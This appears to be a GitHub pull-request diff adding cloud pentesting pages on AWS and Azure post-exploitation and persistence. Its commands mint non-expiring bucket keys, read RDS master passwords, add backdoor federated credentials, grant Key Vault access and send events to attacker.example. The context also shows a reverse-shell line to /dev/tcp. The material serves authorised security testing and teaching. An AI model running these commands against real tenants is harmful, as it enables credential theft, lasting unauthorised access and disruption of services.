Skip to content
Open
Show file tree
Hide file tree
Changes from all commits
Commits
File filter

Filter by extension

Filter by extension

Conversations
Failed to load comments.
Loading
Jump to
Jump to file
Failed to load files.
Loading
Diff view
Diff view
12 changes: 11 additions & 1 deletion src/SUMMARY.md
Original file line number Diff line number Diff line change
Expand Up @@ -105,6 +105,7 @@
- [GCP - Cloud Domains Post Exploitation](pentesting-cloud/gcp-security/gcp-post-exploitation/gcp-cloud-domains-post-exploitation.md)
- [GCP - Cloud Functions Post Exploitation](pentesting-cloud/gcp-security/gcp-post-exploitation/gcp-cloud-functions-post-exploitation.md)
- [GCP - Cloud Run Post Exploitation](pentesting-cloud/gcp-security/gcp-post-exploitation/gcp-cloud-run-post-exploitation.md)
- [GCP - Cloud Scheduler Post Exploitation](pentesting-cloud/gcp-security/gcp-post-exploitation/gcp-cloud-scheduler-post-exploitation.md)
- [GCP - Cloud Shell Post Exploitation](pentesting-cloud/gcp-security/gcp-post-exploitation/gcp-cloud-shell-post-exploitation.md)
- [GCP - DLP (Sensitive Data Protection) Post Exploitation](pentesting-cloud/gcp-security/gcp-post-exploitation/gcp-dlp-post-exploitation.md)
- [GCP - Cloud SQL Post Exploitation](pentesting-cloud/gcp-security/gcp-post-exploitation/gcp-cloud-sql-post-exploitation.md)
Expand Down Expand Up @@ -384,6 +385,7 @@
- [AWS - EFS Post Exploitation](pentesting-cloud/aws-security/aws-post-exploitation/aws-efs-post-exploitation/README.md)
- [AWS - EKS Post Exploitation](pentesting-cloud/aws-security/aws-post-exploitation/aws-eks-post-exploitation/README.md)
- [AWS - Elastic Beanstalk Post Exploitation](pentesting-cloud/aws-security/aws-post-exploitation/aws-elastic-beanstalk-post-exploitation/README.md)
- [AWS - EventBridge Scheduler Post Exploitation](pentesting-cloud/aws-security/aws-post-exploitation/aws-eventbridge-scheduler-post-exploitation.md)
- [AWS - Glue Post Exploitation](pentesting-cloud/aws-security/aws-post-exploitation/aws-glue-post-exploitation/README.md)
- [AWS - IAM Post Exploitation](pentesting-cloud/aws-security/aws-post-exploitation/aws-iam-post-exploitation/README.md)
- [AWS resource-policy principal validation](pentesting-cloud/aws-security/aws-post-exploitation/aws-iam-post-exploitation/aws-resource-policy-principal-validation.md)
Expand Down Expand Up @@ -417,7 +419,7 @@
- [AWS - Step Functions Post Exploitation](pentesting-cloud/aws-security/aws-post-exploitation/aws-stepfunctions-post-exploitation/README.md)
- [AWS - STS Post Exploitation](pentesting-cloud/aws-security/aws-post-exploitation/aws-sts-post-exploitation/README.md)
- [AWS - VPN Post Exploitation](pentesting-cloud/aws-security/aws-post-exploitation/aws-vpn-post-exploitation/README.md)
- [Readme](pentesting-cloud/aws-security/aws-post-exploitation/aws-workmail-post-exploitation/README.md)
- [AWS - WorkMail Post Exploitation](pentesting-cloud/aws-security/aws-post-exploitation/aws-workmail-post-exploitation/README.md)
- [AWS - Privilege Escalation](pentesting-cloud/aws-security/aws-privilege-escalation/README.md)
- [AWS - Amplify Hosting Privesc](pentesting-cloud/aws-security/aws-privilege-escalation/aws-amplify-privesc/README.md)
- [AWS - Apigateway Privesc](pentesting-cloud/aws-security/aws-privilege-escalation/aws-apigateway-privesc/README.md)
Expand Down Expand Up @@ -640,8 +642,11 @@
- [Az - Enumeration Tools](pentesting-cloud/azure-security/az-enumeration-tools.md)
- [Az - Unauthenticated Enum & Initial Entry](pentesting-cloud/azure-security/az-unauthenticated-enum-and-initial-entry/README.md)
- [Az - Container Registry Unauth](pentesting-cloud/azure-security/az-unauthenticated-enum-and-initial-entry/az-container-registry-unauth.md)
- [Az - Cosmos DB Unauthenticated Enumeration](pentesting-cloud/azure-security/az-unauthenticated-enum-and-initial-entry/az-cosmosdb-unauth.md)
- [Az - OAuth Apps Phishing](pentesting-cloud/azure-security/az-unauthenticated-enum-and-initial-entry/az-oauth-apps-phishing.md)
- [Az - Storage Unauth](pentesting-cloud/azure-security/az-unauthenticated-enum-and-initial-entry/az-storage-unauth.md)
- [Az - Service Bus Initial Entry with Leaked Credentials](pentesting-cloud/azure-security/az-unauthenticated-enum-and-initial-entry/az-servicebus-unauth.md)
- [Az - SQL Unauthenticated Enumeration & Initial Entry](pentesting-cloud/azure-security/az-unauthenticated-enum-and-initial-entry/az-sql-unauth.md)
- [Az - VMs Unauth](pentesting-cloud/azure-security/az-unauthenticated-enum-and-initial-entry/az-vms-unauth.md)
- [Az - Monitor Alert Phishing](pentesting-cloud/azure-security/az-unauthenticated-enum-and-initial-entry/az-monitor-alert-phishing.md)
- [Az - Device Code Authentication Phishing](pentesting-cloud/azure-security/az-unauthenticated-enum-and-initial-entry/az-device-code-authentication-phishing.md)
Expand Down Expand Up @@ -707,6 +712,7 @@
- [Az API Management Post Exploitation](pentesting-cloud/azure-security/az-post-exploitation/az-api-management-post-exploitation.md)
- [Az Azure Ai Foundry Post Exploitation](pentesting-cloud/azure-security/az-post-exploitation/az-azure-ai-foundry-post-exploitation.md)
- [Az - Blob Storage Post Exploitation](pentesting-cloud/azure-security/az-post-exploitation/az-blob-storage-post-exploitation.md)
- [Az - Cloud Shell Post Exploitation](pentesting-cloud/azure-security/az-post-exploitation/az-cloud-shell-post-exploitation.md)
- [Az - Container Registry Post Exploitation](pentesting-cloud/azure-security/az-post-exploitation/az-container-registry-post-exploitation.md)
- [Az - CosmosDB Post Exploitation](pentesting-cloud/azure-security/az-post-exploitation/az-cosmosDB-post-exploitation.md)
- [Az - File Share Post Exploitation](pentesting-cloud/azure-security/az-post-exploitation/az-file-share-post-exploitation.md)
Expand Down Expand Up @@ -781,11 +787,15 @@
- [Az - Persistence](pentesting-cloud/azure-security/az-persistence/README.md)
- [Az - Automation Accounts Persistence](pentesting-cloud/azure-security/az-persistence/az-automation-accounts-persistence.md)
- [Az - Cloud Shell Persistence](pentesting-cloud/azure-security/az-persistence/az-cloud-shell-persistence.md)
- [Az - Entra ID Persistence](pentesting-cloud/azure-security/az-persistence/az-entraid-persistence.md)
- [Az - Key Vault Persistence](pentesting-cloud/azure-security/az-persistence/az-key-vault-persistence.md)
- [Az - Logic Apps Persistence](pentesting-cloud/azure-security/az-persistence/az-logic-apps-persistence.md)
- [Az - Service Bus Persistence](pentesting-cloud/azure-security/az-persistence/az-servicebus-persistence.md)
- [Az - SQL Persistence](pentesting-cloud/azure-security/az-persistence/az-sql-persistence.md)
- [Az - Queue Storage Persistence](pentesting-cloud/azure-security/az-persistence/az-queue-persistence.md)
- [Az - VMs Persistence](pentesting-cloud/azure-security/az-persistence/az-vms-persistence.md)
- [Az - Storage Persistence](pentesting-cloud/azure-security/az-persistence/az-storage-persistence.md)
- [Az - Virtual Desktop Persistence](pentesting-cloud/azure-security/az-persistence/az-virtual-desktop-persistence.md)
- [Az - Device Registration](pentesting-cloud/azure-security/az-device-registration.md)
- [Digital Ocean Pentesting](pentesting-cloud/digital-ocean-pentesting/README.md)
- [DO - Basic Information](pentesting-cloud/digital-ocean-pentesting/do-basic-information.md)
Expand Down
Original file line number Diff line number Diff line change
Expand Up @@ -45,6 +45,19 @@ If the assessment includes control of a domain's authoritative DNS zone:
- Add a **TXT** SPF policy that authorizes a sender you control to send **email** using the domain. SPF lets a domain explicitly authorize hosts and lets receivers check that authorization; it is not a blanket guarantee that every recipient will accept the message.<sup>[[7]](#references)</sup>
- Point the **apex** A/AAAA record at an endpoint you control. DNS maps the domain to that endpoint; relaying requests to the legitimate service requires a proxy or equivalent application-layer component, so DNS redirection alone is not a MitM.<sup>[[5]](#references)</sup>

### Non-expiring bucket access keys

`aws lightsail create-bucket-access-key` returns a long-lived access-key/secret pair for a Lightsail bucket that **does not expire** and lives **outside the caller's IAM identity**. Revoking the IAM permission that minted it — or even deleting the compromised user — does **not** invalidate the key; bucket read/write continues until someone explicitly calls `delete-bucket-access-key`. Mint one, stash it, and you retain access to the bucket's objects across cleanup.

```bash
aws lightsail create-bucket-access-key --bucket-name <bucket-name>
# -> returns accessKeyId + secretAccessKey (non-expiring); use them as S3-compatible creds

# List existing keys on a bucket (max 2 per bucket)
aws lightsail get-bucket-access-keys --bucket-name <bucket-name>
```


## References

- [1] [Manage SSH key pairs and connect to your Lightsail instances](https://docs.aws.amazon.com/lightsail/latest/userguide/understanding-ssh-in-amazon-lightsail.html)
Expand Down
Original file line number Diff line number Diff line change
@@ -0,0 +1,38 @@
# AWS - EventBridge Scheduler Post Exploitation

{{#include ../../../banners/hacktricks-training.md}}

## Disrupt or hijack existing schedules

`scheduler:DeleteSchedule` can remove automation used for backups, patching, billing exports, or operational jobs. Deletion does not require `iam:PassRole`:

```bash
aws scheduler delete-schedule --name <schedule> --group-name <group-or-default>
```

With `scheduler:UpdateSchedule`, an attacker can disable a schedule or replace its target and input. `UpdateSchedule` is a replace operation, so all required settings must be supplied; omitted optional settings are reset to their defaults. Unlike deletion, updating a schedule also requires `iam:PassRole` for the execution role supplied in `Target.RoleArn`.<sup>[[1]](#references)[[2]](#references)</sup>

```bash
# First preserve the settings that should not change.
aws scheduler get-schedule --name <schedule> --group-name <group-or-default>

# Disable the schedule. Supply its current expression, target, and flexible window.
aws scheduler update-schedule --name <schedule> --group-name <group-or-default> \
--schedule-expression '<current-expression>' \
--flexible-time-window '{"Mode":"OFF"}' \
--target '<current-target-json>' \
--state DISABLED

# Or redirect execution when PassRole is allowed for the supplied role.
aws scheduler update-schedule --name <schedule> --group-name <group-or-default> \
--schedule-expression '<current-expression>' \
--flexible-time-window '{"Mode":"OFF"}' \
--target '{"Arn":"<attacker-chosen-target-arn>","RoleArn":"<passable-role-arn>","Input":"<crafted-input>"}'
```

## References

- [1] [Changing the schedule state in EventBridge Scheduler](https://docs.aws.amazon.com/scheduler/latest/UserGuide/managing-schedule-state.html)
- [2] [Actions, resources, and condition keys for Amazon EventBridge Scheduler](https://docs.aws.amazon.com/service-authorization/latest/reference/list_scheduler.html)

{{#include ../../../banners/hacktricks-training.md}}
Original file line number Diff line number Diff line change
Expand Up @@ -593,6 +593,26 @@ aws iam delete-role --role-name rds-proxy-secret-role
aws secretsmanager delete-secret --secret-id rds/proxy/aurora-demo --force-delete-without-recovery
```

### Read the RDS-managed master password from Secrets Manager (`rds:DescribeDB*` + `secretsmanager:GetSecretValue`)

When a DB instance or cluster is configured with **RDS-managed master credentials**, RDS stores the real master password in a Secrets Manager secret and exposes its ARN in the instance/cluster description. Any principal with `secretsmanager:GetSecretValue` on that secret (plus `kms:Decrypt` if a CMK is used) can read the live master credentials directly — no snapshot, restore, or password reset required, and far quieter than `ModifyDBInstance`.

```bash
# 1) Find instances/clusters whose master password RDS manages in Secrets Manager
aws rds describe-db-instances \
--query 'DBInstances[?MasterUserSecret!=null].{DB:DBInstanceIdentifier,User:MasterUsername,Secret:MasterUserSecret.SecretArn}' \
--output table
aws rds describe-db-clusters \
--query 'DBClusters[?MasterUserSecret!=null].{Cluster:DBClusterIdentifier,User:MasterUsername,Secret:MasterUserSecret.SecretArn}' \
--output table

# 2) Read the managed secret -> live master username/password
aws secretsmanager get-secret-value \
--secret-id <MasterUserSecretArn> \
--query SecretString --output text
```


### Stealthy continuous exfiltration via Aurora zero‑ETL to Amazon Redshift (rds:CreateIntegration)

Abuse an Aurora PostgreSQL zero‑ETL integration to continuously replicate production data into a Redshift Serverless namespace you control. With a permissive Redshift resource policy that authorizes `CreateInboundIntegration`/`AuthorizeInboundIntegration` for a specific Aurora cluster ARN, an attacker can establish a near‑real‑time data copy through the AWS control plane without DB credentials, snapshots, or a network path to the source.<sup>[[31]](#references)[[32]](#references)[[33]](#references)[[34]](#references)</sup>
Expand Down
Original file line number Diff line number Diff line change
Expand Up @@ -17,15 +17,6 @@ echo '(nohup /usr/bin/env /bin/bash 2>/dev/null -norc -noprofile >& /dev/tcp/<AT

The durable component is the modification to `$HOME`, not the process created on the temporary host. The process is bounded by that host's lifetime, while the startup command can run again in later storage-backed sessions; Cloud Shell currently times out after 20 minutes without interactive activity.<sup>[[1]](#references)</sup>

Cloud Shell automatically authenticates Azure CLI and Azure PowerShell for the signed-in user. It exposes an alternative managed-identity-style endpoint through `$MSI_ENDPOINT` for requesting user tokens for supported audiences; this differs from the `169.254.169.254` IMDS endpoint used by Azure VMs.<sup>[[1]](#references)[[5]](#references)[[6]](#references)[[7]](#references)</sup>

```bash
curl -s -G -H "Metadata:true" \
--data-urlencode "api-version=2018-02-01" \
--data-urlencode "resource=https://management.azure.com/" \
"$MSI_ENDPOINT"
```

### Cloud Shell Phishing

If an attacker has read and write access to the Azure file share backing another user's persistent Cloud Shell, they can tamper with that user's `.cloudconsole/acc_<user>.img`. Microsoft warns that identities with sufficient inherited permissions can access Cloud Shell storage accounts and file shares, and recommends restricting access at the storage-account or subscription level.<sup>[[2]](#references)</sup>
Expand Down Expand Up @@ -70,8 +61,5 @@ The final step is to induce the user to start a new session at `https://shell.az
- [2] [Persist files in Azure Cloud Shell](https://learn.microsoft.com/en-us/azure/cloud-shell/persisting-shell-storage)
- [3] [Bash Startup Files](https://www.gnu.org/software/bash/manual/html_node/Bash-Startup-Files.html)
- [4] [Predictive IntelliSense in Azure Cloud Shell](https://learn.microsoft.com/en-us/azure/cloud-shell/cloud-shell-predictive-intellisense)
- [5] [Azure Cloud Shell frequently asked questions](https://learn.microsoft.com/en-us/azure/cloud-shell/faq-troubleshooting)
- [6] [Azure Cloud Shell, az login, and Managed Identity](https://edyoung.github.io/blog/cloud_shell_auth/)
- [7] [Some environment variables in Cloud Shell](https://edyoung.github.io/blog/vars/)

{{#include ../../../banners/hacktricks-training.md}}
Original file line number Diff line number Diff line change
@@ -0,0 +1,29 @@
# Az - Entra ID Persistence

{{#include ../../../banners/hacktricks-training.md}}

## Federated identity credential on an application

A federated identity credential (FIC) makes an Entra application trust tokens from an external OIDC workload, such as an attacker-controlled GitHub Actions repository or another supported issuer. The external workload can exchange a matching token for an Entra access token as the application's service principal without storing a client secret in Entra.<sup>[[1]](#references)[[2]](#references)</sup>

Creating the FIC requires authority over the target application. For Microsoft Graph, delegated creation requires `Application.ReadWrite.All` plus a supported directory role (or ownership where supported), while application access can use `Application.ReadWrite.OwnedBy` for owned applications or `Application.ReadWrite.All` more broadly.<sup>[[1]](#references)</sup>

```bash
az ad app federated-credential create --id <app-id> --parameters '{
"name": "backdoor-fic",
"issuer": "https://token.actions.githubusercontent.com",
"subject": "repo:attacker/repository:ref:refs/heads/main",
"audiences": ["api://AzureADTokenExchange"]
}'

az ad app federated-credential list --id <app-id>
```

The issuer, subject, and audience in the external token must exactly match the FIC. The resulting identity receives only permissions already granted to the application's service principal; adding a FIC does not grant new API or Azure RBAC permissions by itself.

## References

- [1] [Create federatedIdentityCredential](https://learn.microsoft.com/en-us/graph/api/federatedidentitycredential-post)
- [2] [Workload identity federation](https://learn.microsoft.com/en-us/entra/workload-id/workload-identity-federation)

{{#include ../../../banners/hacktricks-training.md}}
Original file line number Diff line number Diff line change
@@ -0,0 +1,51 @@
# Az - Key Vault Persistence

{{#include ../../../banners/hacktricks-training.md}}

## Backdoor a data-plane principal

With permission to change a vault's access policies or create Azure role assignments at the vault scope, an attacker can grant an identity durable data-plane access. These are control-plane operations; having permission to read secrets alone is insufficient.

```bash
# Access-policy vault
az keyvault set-policy --name <vault-name> --object-id <attacker-principal-object-id> \
--secret-permissions get list

# Azure RBAC vault
az role assignment create --assignee <attacker-principal-object-id> \
--role "Key Vault Secrets User" \
--scope "/subscriptions/<subscription-id>/resourceGroups/<rg>/providers/Microsoft.KeyVault/vaults/<vault-name>"
```

## Retain restorable object backups

Key Vault backup operations return an encrypted blob for an individual key, secret, or certificate. The blob cannot be decrypted offline. It can only be restored to a vault in the **same Azure subscription and Azure geography**, and restoring it requires the corresponding data-plane restore permission.<sup>[[1]](#references)</sup>

Within those constraints, retaining a backup can preserve a point-in-time copy after the original object is rotated or deleted. A restored copy is independent of the original.

```bash
az keyvault secret backup --vault-name <vault-name> --name <secret-name> --file secret.backup
az keyvault key backup --vault-name <vault-name> --name <key-name> --file key.backup
az keyvault certificate backup --vault-name <vault-name> --name <certificate-name> --file certificate.backup
```

## Event Grid notification for new versions

Key Vault emits Event Grid events such as `Microsoft.KeyVault.SecretNewVersionCreated`. A resource-level Event Grid subscription can provide a durable notification channel to an attacker-controlled webhook:

```bash
az eventgrid event-subscription create --name kv-version-notify \
--source-resource-id "/subscriptions/<subscription-id>/resourceGroups/<rg>/providers/Microsoft.KeyVault/vaults/<vault-name>" \
--endpoint https://attacker.example/webhook \
--included-event-types Microsoft.KeyVault.SecretNewVersionCreated
```

The event contains metadata, not the secret value. Retrieving the new value still requires valid Key Vault data-plane access, and webhook endpoints must complete Event Grid endpoint validation.<sup>[[2]](#references)[[3]](#references)</sup>

## References

- [1] [Back up a secret, key, or certificate stored in Azure Key Vault](https://learn.microsoft.com/en-us/azure/key-vault/general/backup)
- [2] [Azure Key Vault as Event Grid source](https://learn.microsoft.com/en-us/azure/event-grid/event-schema-key-vault)
- [3] [Event Grid webhook event delivery](https://learn.microsoft.com/en-us/azure/event-grid/webhook-event-delivery)

{{#include ../../../banners/hacktricks-training.md}}
Loading